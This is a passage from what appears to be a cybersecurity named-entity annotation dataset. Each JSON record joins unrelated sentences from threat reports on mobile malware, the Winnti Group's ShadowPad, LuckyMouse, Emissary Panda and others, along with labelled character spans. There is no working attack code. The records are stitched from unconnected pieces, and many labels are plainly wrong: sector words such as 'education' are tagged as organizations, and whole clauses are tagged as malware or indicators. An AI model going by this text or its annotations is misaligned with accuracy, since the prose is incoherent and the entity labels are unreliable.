This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": [{"start": 161, "end": 171, "label": "Organization"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 325, "end": 345, "label": "System"}, {"start": 384, "end": 392, "label": "Organization"}, {"start": 403, "end": 428, "label": "Organization"}]} {"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers . It's possible TG-3390 used a waterhole to infect data center employees . This article focuses on the technical details of this new ShadowPad variant . Protecting your information and systems from every vantage point , including your networks , devices , applications , transmissions , privileges , and storage is critical , as is regularly training your staff on the latest cyber threats , trends , and ransomware phishing attacks .", "spans": [{"start": 142, "end": 149, "label": "Organization"}, {"start": 177, "end": 198, "label": "Organization"}, {"start": 259, "end": 268, "label": "Malware"}]} {"text": "For example , the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim \u2019 s list of contacts . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . 
About the \u201c Winnti Group \u201d naming : After gaining access to a victim network , UNC2452 has a light malware footprint , often using legitimate credentials to access data and move laterally .", "spans": [{"start": 25, "end": 54, "label": "Malware"}, {"start": 103, "end": 128, "label": "Malware"}, {"start": 280, "end": 294, "label": "Vulnerability"}, {"start": 297, "end": 329, "label": "System"}, {"start": 468, "end": 480, "label": "Organization"}, {"start": 535, "end": 542, "label": "Organization"}, {"start": 547, "end": 643, "label": "Organization"}]} {"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests . We have chosen to keep the name \u201c Winnti Group \u201d since it \u2019s the name first used to identify it , in 2013 , by Kaspersky . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": [{"start": 189, "end": 195, "label": "System"}, {"start": 316, "end": 328, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 591, "end": 616, "label": "System"}, {"start": 622, "end": 635, "label": "System"}]} {"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . Since Winnti is also a malware family , we always write \u201c Winnti Group \u201d when we refer to the malefactors behind the attacks . 
TIEDYE has similarities to RABBITHUNT , which is a backdoor written in C++ that communicates via a custom binary protocol over TCP .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 229, "end": 237, "label": "System"}, {"start": 245, "end": 254, "label": "System"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 315, "end": 327, "label": "Organization"}, {"start": 384, "end": 390, "label": "Malware"}, {"start": 411, "end": 421, "label": "Malware"}, {"start": 433, "end": 514, "label": "Malware"}]} {"text": "In 2013 , 3,905,502 installation packages were used by cybercriminals to distribute mobile malware . There were traces of HyperBro in the infected data center from mid-November 2017 . Since 2013 , it has been demonstrated that Winnti is only one of the many malware families used by the Winnti Group . Once the initial export is called ( in this case , the legitimately named function IETrackingProtectionEnabled ) , the downloader will copy itself and call regsvr32.exe with parameters \u201c /u /s \u201d to automatically call the function for unregistering COM servers DllUnregisterServer .", "spans": [{"start": 122, "end": 130, "label": "System"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 287, "end": 299, "label": "Organization"}, {"start": 453, "end": 531, "label": "Indicator"}, {"start": 550, "end": 581, "label": "System"}]} {"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text messages it spreads . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . 
In November 2019 , ESET \u2019s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 320, "end": 329, "label": "Organization"}, {"start": 375, "end": 383, "label": "System"}, {"start": 391, "end": 400, "label": "System"}, {"start": 422, "end": 426, "label": "Organization"}, {"start": 456, "end": 461, "label": "System"}, {"start": 583, "end": 589, "label": "Malware"}, {"start": 690, "end": 712, "label": "Organization"}, {"start": 743, "end": 757, "label": "Organization"}]} {"text": "Android remains a prime target for malicious attacks . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology . The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher . The malware then checks the command execution functionality using a command that vary across the samples .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 150, "end": 159, "label": "Organization"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 220, "end": 225, "label": "System"}, {"start": 251, "end": 260, "label": "Malware"}, {"start": 272, "end": 283, "label": "Malware"}, {"start": 289, "end": 376, "label": "Malware"}]} {"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture . 
Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups . Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 217, "end": 222, "label": "System"}, {"start": 230, "end": 241, "label": "System"}, {"start": 244, "end": 247, "label": "System"}, {"start": 373, "end": 382, "label": "Malware"}, {"start": 387, "end": 393, "label": "Malware"}, {"start": 455, "end": 458, "label": "System"}, {"start": 545, "end": 552, "label": "Organization"}]} {"text": "Most mobile malware is designed to steal users \u2019 money , including SMS-Trojans , and lots of backdoors and Trojans . Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak . In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants . Further , NIST does not endorse any commercial products that may be mentioned on these sites .", "spans": [{"start": 285, "end": 288, "label": "System"}, {"start": 444, "end": 453, "label": "Malware"}, {"start": 458, "end": 464, "label": "Malware"}, {"start": 486, "end": 490, "label": "Organization"}]} {"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 . Emissary Panda is still active and continues to target selected organisations . 
This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill . For example , the report shows that the US shouldered a hefty 43 percent of all global attacks and that ransomware attacks in France nearly doubled in the last five months .", "spans": [{"start": 263, "end": 275, "label": "Organization"}, {"start": 539, "end": 557, "label": "Organization"}]} {"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks . Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police . STRATOFEAR contains an embedded configuration that includes two file paths .", "spans": [{"start": 10, "end": 23, "label": "Organization"}, {"start": 88, "end": 101, "label": "Organization"}, {"start": 415, "end": 425, "label": "Malware"}, {"start": 426, "end": 489, "label": "Malware"}]} {"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively . The campaign is believed to be active covertly since fall 2017 . These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters . 
PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \" or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 492, "end": 498, "label": "System"}, {"start": 508, "end": 517, "label": "System"}]} {"text": "There were several distinct areas where mobile malware underwent advances . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers that was found targeting Asian countries with Bitcoin mining malware early this year . We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise . Additional attacker backdoors identified on systems with names that masqueraded as legitimate binaries and also produced AOT files upon translation ( e.g. , npx-cli and npx-cli.aot ) .", "spans": [{"start": 76, "end": 86, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 129, "label": "Organization"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 143, "end": 160, "label": "Organization"}, {"start": 245, "end": 267, "label": "System"}, {"start": 428, "end": 446, "label": "Organization"}, {"start": 447, "end": 564, "label": "Indicator"}]} {"text": "Distribution Cybercriminals made use of some exceptionally sophisticated methods to infect mobile devices . March by security researchers from Kaspersky Lab . Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect . 
Victims of the campaign , which researchers named Out to Sea PDF , include diplomatic organizations , technology companies , and medical organizations in Israel , Tunisia , and the UAE .", "spans": [{"start": 143, "end": 157, "label": "Organization"}, {"start": 176, "end": 185, "label": "Malware"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 300, "end": 309, "label": "System"}, {"start": 327, "end": 335, "label": "Organization"}, {"start": 362, "end": 376, "label": "Organization"}, {"start": 387, "end": 411, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 441, "end": 462, "label": "Organization"}]} {"text": "Infecting legal web resources help spread mobile malware via popular websites . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network . Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 113, "end": 116, "label": "Organization"}, {"start": 407, "end": 413, "label": "System"}]} {"text": "More and more smartphone and tablet owners use their devices to access websites , unaware that even the most reputable resources can be hacked . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors . And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either . 
They will frequently compromise a system to then place the hidden service on that particular system .", "spans": [{"start": 331, "end": 350, "label": "Organization"}, {"start": 479, "end": 497, "label": "Malware"}, {"start": 500, "end": 508, "label": "Malware"}, {"start": 518, "end": 527, "label": "Malware"}]} {"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites . attacks to a Chinese-speaking threat actor group called LuckyMouse . In this case , the launcher is much simpler . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 230, "end": 242, "label": "Malware"}, {"start": 282, "end": 379, "label": "Malware"}, {"start": 390, "end": 408, "label": "Organization"}, {"start": 413, "end": 443, "label": "Organization"}]} {"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe . 
In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 90, "end": 120, "label": "Vulnerability"}, {"start": 123, "end": 137, "label": "Vulnerability"}, {"start": 167, "end": 170, "label": "System"}, {"start": 177, "end": 189, "label": "Indicator"}, {"start": 226, "end": 229, "label": "System"}, {"start": 240, "end": 252, "label": "Indicator"}, {"start": 312, "end": 324, "label": "Organization"}, {"start": 334, "end": 340, "label": "Organization"}, {"start": 407, "end": 416, "label": "Organization"}, {"start": 531, "end": 589, "label": "Organization"}]} {"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This executable is from HP and is usually installed with their printing and scanning software called \u201c HP Digital Imaging \u201d . So , instead of wasting time trying to figure out what is going on , I debugged the script using the browser .", "spans": [{"start": 47, "end": 60, "label": "System"}, {"start": 73, "end": 80, "label": "System"}, {"start": 183, "end": 194, "label": "System"}, {"start": 417, "end": 419, "label": "Organization"}, {"start": 496, "end": 514, "label": "System"}, {"start": 616, "end": 627, "label": "System"}]} {"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . 
The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse may have conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine \u2019s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": [{"start": 272, "end": 282, "label": "Organization"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 444, "end": 456, "label": "Indicator"}, {"start": 515, "end": 527, "label": "Indicator"}, {"start": 658, "end": 670, "label": "Organization"}]} {"text": "Distribution via botnets . According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks . Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-loading . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 87, "end": 102, "label": "System"}, {"start": 403, "end": 426, "label": "System"}, {"start": 510, "end": 582, "label": "Indicator"}]} {"text": "As a rule , bots self-proliferate by sending out text messages with a malicious link to addresses in the victim \u2019 s address book . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) . 
When the malicious DLL is loaded at hpqhvind.exe startup , its DllMain function is called , which checks the parent process for the following sequence of bytes at offset 0x10BA . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": [{"start": 182, "end": 190, "label": "System"}, {"start": 195, "end": 215, "label": "System"}, {"start": 218, "end": 221, "label": "System"}, {"start": 245, "end": 248, "label": "System"}, {"start": 262, "end": 274, "label": "Indicator"}]} {"text": "We also registered one episode of mobile malware spreading via a third-party botnet . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 . In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 230, "end": 238, "label": "System"}, {"start": 338, "end": 350, "label": "Indicator"}, {"start": 428, "end": 431, "label": "System"}]} {"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim \u2019 s mobile device is an important aspect of its development . the targets of the hacking group were in the automotive . It replaces the original instructions at 0x10BA with an unconditional jump ( jmp , opcode 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher . 
In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": [{"start": 217, "end": 227, "label": "Organization"}, {"start": 356, "end": 368, "label": "Indicator"}, {"start": 453, "end": 458, "label": "Organization"}, {"start": 473, "end": 481, "label": "Malware"}]} {"text": "The longer a Trojan \u201c lives \u201d on a smartphone , the more money it will make for the owner . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . The decompiled function responsible for patching the parent process . In fact , they often drive one another to complete more complicated hacks .", "spans": [{"start": 92, "end": 108, "label": "Organization"}, {"start": 149, "end": 159, "label": "Organization"}]} {"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups . In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed . 
Indicators of Attack are different from Indicators of Compromise IoC , the latter describing evidence of compromised network security .", "spans": [{"start": 180, "end": 199, "label": "Organization"}, {"start": 202, "end": 210, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 246, "end": 269, "label": "Organization"}, {"start": 315, "end": 337, "label": "Organization"}, {"start": 348, "end": 360, "label": "Indicator"}, {"start": 399, "end": 411, "label": "Indicator"}, {"start": 470, "end": 490, "label": "Indicator"}, {"start": 510, "end": 538, "label": "Indicator"}]} {"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind.exe . Paired with KillNet \u2019s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet \u2019s capabilities since the collective \u2019s inception in late 2021 .", "spans": [{"start": 192, "end": 208, "label": "Organization"}, {"start": 418, "end": 430, "label": "Indicator"}]} {"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code . 
Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack . The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe . Once a system was exploited a unique downloader was dropped onto the victim \u2019s disk , containing a customized micro backdoor written in Assembler .", "spans": [{"start": 130, "end": 147, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 531, "end": 543, "label": "Indicator"}, {"start": 682, "end": 691, "label": "System"}]} {"text": "Tellingly , current virus writers have mastered commercial obfuscators . the United Kingdom had data stolen by members of Emissary Panda . The patched code is located right after the load of hpqhvsei.dll . Additionally , the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still having a PTR record to the domain previously identified .", "spans": [{"start": 122, "end": 136, "label": "Organization"}, {"start": 191, "end": 203, "label": "Indicator"}, {"start": 225, "end": 253, "label": "System"}, {"start": 284, "end": 311, "label": "System"}]} {"text": "This implies they have made considerable investments . the US had data stolen by members of Emissary Panda . This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL . 
LIGHTWORK utilizes positional command line arguments for target device, port, and IEC-104 command.

For example, one commercial obfuscator, which cost €350, was used for the Trojans Opfak.bo and Obad.a. Android vulnerabilities are used by criminals for three reasons: to bypass the code integrity check when installing an application (the Master Key vulnerability); to enhance the rights of malicious applications, considerably extending their capabilities; and to make it more difficult to remove malware. No zero-day vulnerabilities were used to breach targeted networks; instead "TG-3390 relied on old vulnerabilities such as CVE-2011-3544"—a four-year-old Java security hole—"and CVE-2010-0738 to compromise their targets", Dell SecureWorks' researchers reported. The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration. WithSecure has identified instances where the malware was delivered to victims through LinkedIn.

For example, Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program.
The group used a number of tools common to other Chinese hacking groups, but they had a few unique tools of their own with interfaces developed for Standard (Simplified) Chinese. The decrypted payload is the usual shellcode responsible for ShadowPad initialization (obfuscated using fake conditional jumps to hinder disassembly). The threat of Iranian cyber operations continues to rise as challenges in relation to the renewal of the 2015 Iranian Nuclear Deal persist and regional tensions, specifically between Israel and Iran, escalate.

Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages. If the address falls within ranges that the attackers are interested in, the malicious site waits for their next page view to drop an exploit on the desired target's PC. After having been decrypted, ShadowPad's shellcode is executed.
But then, following an upsurge in attacks in the second half of 2014, GReAT characterized MiniDuke, CosmicDuke and the actor's Nemesis Gemina project (targeting government, diplomatic, energy, military and telecom operators) as "one of the world's most unusual APT operations" due to:
• Its use of a customized backdoor written in Assembler using "old school" virus writing techniques and habits
• Stealthy transfer of updates as executables hidden inside GIF files (a form of steganography)

Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive. Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage, which screens their IP address. It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool.

ThreatConnect Can Help Protect Your Organization from Phishing and BEC Attacks

The system verifies the signature of the legitimate file while installing the malicious file. There has also been at least one victim targeted by a spear-phishing attack. In the case we examined, the path was C:\ProgramData\DRM\CLR\CLR.exe.
The campaign started in at least June 2023, and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017.

Unfortunately, there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers. A variety of malware, including the PlugX tool, was shared with other known Chinese threat groups. It then creates a service named clr_optimization_v4.0.30229_32, which is responsible for executing CLR.exe. The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses (IOA), which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration.

However, many users are in no hurry to update the operating systems of their products. Once inside networks, the group generally targeted Windows network domain controllers and Exchange e-mail servers, targeting user credentials to allow them to move to other systems throughout the targeted network. To avoid suspicion, this service name, as well as the executable name, were chosen to look similar to the name of the Microsoft .NET optimization service (the genuine NGEN service on a .NET 4 host is clr_optimization_v4.0.30319_32 and runs mscorsvw.exe from under %WINDIR%\Microsoft.NET; the malicious one differs by two digits and runs CLR.exe from ProgramData).
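A lookalike service name one or two digits away from the genuine NGEN service is cheap to check for. The Python below is an added example, not code from ESET's ShadowPad write-up: it compares every service name against the four legitimate clr_optimization_* names, flags near misses by edit distance, and separately flags a genuine name whose image is not mscorsvw.exe under Microsoft.NET. The service list is constructed for illustration; on a live host you would feed it the name and path columns of `Get-CimInstance Win32_Service`.

```python
"""Flag Windows services that imitate the .NET NGEN optimization service.

Added example (not from any report quoted on this page). SAMPLE_SERVICES is
constructed; the legitimate names and image below are the ones Microsoft ships."""
from __future__ import annotations
import ntpath

# The only clr_optimization_* service names shipped with the .NET Framework.
LEGIT_NGEN_SERVICES = {
    "clr_optimization_v2.0.50727_32",
    "clr_optimization_v2.0.50727_64",
    "clr_optimization_v4.0.30319_32",
    "clr_optimization_v4.0.30319_64",
}
LEGIT_NGEN_IMAGE = "mscorsvw.exe"
LEGIT_NGEN_DIR_PREFIX = r"c:\windows\microsoft.net\framework"   # covers Framework64 too


def levenshtein(a: str, b: str) -> int:
    """Edit distance; names are short so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_service(name: str, image_path: str, max_distance: int = 3) -> str | None:
    """Return a finding for a suspicious service, or None when it looks genuine."""
    lname = name.lower()
    limage = image_path.strip('"').lower()
    if lname in LEGIT_NGEN_SERVICES:
        # Genuine name: the binary must still be mscorsvw.exe under Microsoft.NET.
        if ntpath.basename(limage) != LEGIT_NGEN_IMAGE or not limage.startswith(LEGIT_NGEN_DIR_PREFIX):
            return f"{name}: genuine NGEN name but unexpected image {image_path}"
        return None
    # Not a genuine name: is it a near miss of one (digits swapped, as in the report)?
    closest = min(LEGIT_NGEN_SERVICES, key=lambda s: levenshtein(lname, s))
    distance = levenshtein(lname, closest)
    if distance <= max_distance:
        return f"{name}: lookalike of {closest} (edit distance {distance}), image {image_path}"
    return None


def find_lookalike_services(services) -> list[str]:
    """services: iterable of (name, image_path) pairs. Returns the findings."""
    return [f for f in (classify_service(n, p) for n, p in services) if f]


# Constructed sample: two genuine entries, the name from the report, a control.
SAMPLE_SERVICES = [
    ("clr_optimization_v4.0.30319_32", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"),
    ("clr_optimization_v4.0.30319_64", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"),
    ("clr_optimization_v4.0.30229_32", r"C:\ProgramData\DRM\CLR\CLR.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for finding in find_lookalike_services(SAMPLE_SERVICES):
        print(finding)
```

The path check matters as much as the name check: an attacker who copies the genuine name exactly still has to point the service at a binary outside the .NET directory, and that is what the second branch catches.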
Nevertheless, previous analyses by CERT-UA and FortiGuard Labs indicate that final payloads, which included AgentTesla and Cobalt Strike, were used for information theft and remote access to infected systems.

If a smartphone or tablet was released more than a year ago, it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided. They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server. The numbering on each arrow corresponds to the chronological sequence of events. Considering that both Royal and BlackSuit were active last month, however, a rebrand probably isn't happening any time soon.

In that case, the only help comes from an antivirus solution, for example, Kaspersky Internet Security for Android. But two tools used were unique to the group: ASPXTool, an Internet Information Services (IIS) specific "Web shell" used to gain access to servers inside a target's network; and the OwaAuth credential stealing tool and Web shell, used to attack Microsoft Exchange servers running the Web Outlook interface. ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address, a UNIX timestamp (probably embedded automatically during the module's compilation process) and a module identifier.
DLL sideloading attacks use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious payload.

Embedding malicious code in legitimate programs helps conceal infections from the victim. By using such features and tools, attackers are hoping to blend in on the victim's network and hide their activity in a sea of legitimate processes. From the module itself we can also extract the name the developer gave to the module. Sandworm utilized a novel technique to impact the OT environment by executing code within an End-of-Life (EOL) MicroSCADA control system and issuing commands that impacted the victim's connected substations.

Of course, this does not mean the digital signature of the software developer can be used. TAA leverages advanced artificial intelligence and machine learning that combs through Symantec's data lake of telemetry in order to spot patterns associated with targeted attacks.
This version embeds the 17 modules listed in the following table: An attacker could place HTML containing executable JavaScript inside element attributes.

However, due to the absence of certification centers verifying the digital signatures of Android programs, nothing prevents criminals from adding their own signature. In January 2018, TAA triggered an alert at a large telecoms operator in Southeast Asia.

ID   Module       Timestamp (UTC)              Description
100  Root         Thu 24 Oct 2019 12:08:27 PM  Initial shellcode.
101  Plugins      Thu 24 Oct 2019 12:07:02 PM  Provides API for the other modules; loads modules.
102  Config       Thu 24 Oct 2019 12:07:09 PM  Handles encrypted configuration string pool.
103  Install      Thu 24 Oct 2019 12:07:46 PM  Achieves persistence.
104  Online       Thu 24 Oct 2019 12:07:17 PM  Overall communications with the C&C server.
106  ImpUser      Thu 24 Oct 2019 12:07:24 PM  User impersonation via token duplication.
200  TCP          Thu 24 Oct 2019 12:01:01 PM  TCP communications.
202  HTTPS        Thu 24 Oct 2019 12:01:15 PM  HTTPS communications.
207  Pipe         Thu 24 Oct 2019 12:01:35 PM  Handles named pipes.
300  Disk         Thu 24 Oct 2019 12:02:29 PM  File system operations.
301  Process      Thu 24 Oct 2019 12:02:36 PM  Process handling.
302  Servcie      Thu 24 Oct 2019 12:02:45 PM  Service handling.
303  Register     Thu 24 Oct 2019 12:02:52 PM  Registry operations.
304  Shell        Thu 24 Oct 2019 12:03:00 PM  Command line operations.
306  Keylogger    Thu 24 Oct 2019 12:03:16 PM  Keylogging to file system.
307  Screen       Thu 24 Oct 2019 12:03:25 PM  Screenshot capture.
317  RecentFiles  Thu 24 Oct 2019 12:04:44 PM  Lists recently accessed files.
Since early 2022, KillNet has claimed on multiple occasions to be partnering or coordinating with several criminal elements, including multiple occasions in which it claimed to be working with the widely known ransomware group REvil.

As a result, a copy of Angry Birds installed from an unofficial app store or downloaded from a forum could easily contain malicious functionality. Thrip was using PsExec to move laterally between computers on the company's network. These modules, except for RecentFiles, have already been mentioned by Kaspersky and Avast. The article highlighted the increasing popularity of targeted attacks.

Capabilities and functionality

In 2013, we detected several technological innovations developed and used by criminals in their malicious software. Notice the "Servcie" typo.
Based on these symbols, Mandiant assesses with moderate confidence that com.docker.vmnat was a version of the FULLHOUSE.DOORED backdoor.

Below are descriptions of some of the most interesting. As usual, all the module timestamps are spread over a short time range, which could suggest the use of a build framework to compile these modules. Currently, Mandiant has observed the deployment of Atera, AnyDesk, and SplashTop to establish and maintain a foothold following exploitation of CVE-2023-4966.

Control of malware from a single center provides maximum flexibility. PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land. This also suggests that these modules were built a few hours before the launcher itself, whose compilation timestamp is Thu Oct 24 14:10:32 2019. Hello. 3 am. The time of mysticism, isn't it?

Botnets can make considerably more money than autonomous Trojans. TAA not only flagged this malicious use of PsExec, it also told us what the attackers were using it for.
Since this compilation timestamp dates back two weeks before this campaign, it's likely that it hasn't been tampered with by the attackers. An example of these log entries can be found below: By correlating the user, IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend, CrowdStrike found a request using the mailbox to the following OWA URL, , corresponding to the IIS log entry below: The backend request for the new exploitation chain is similar to the example shown below: This request seemed to show a novel, previously undocumented, way to reach the PowerShell remoting service through the OWA frontend endpoint, instead of leveraging the endpoint.

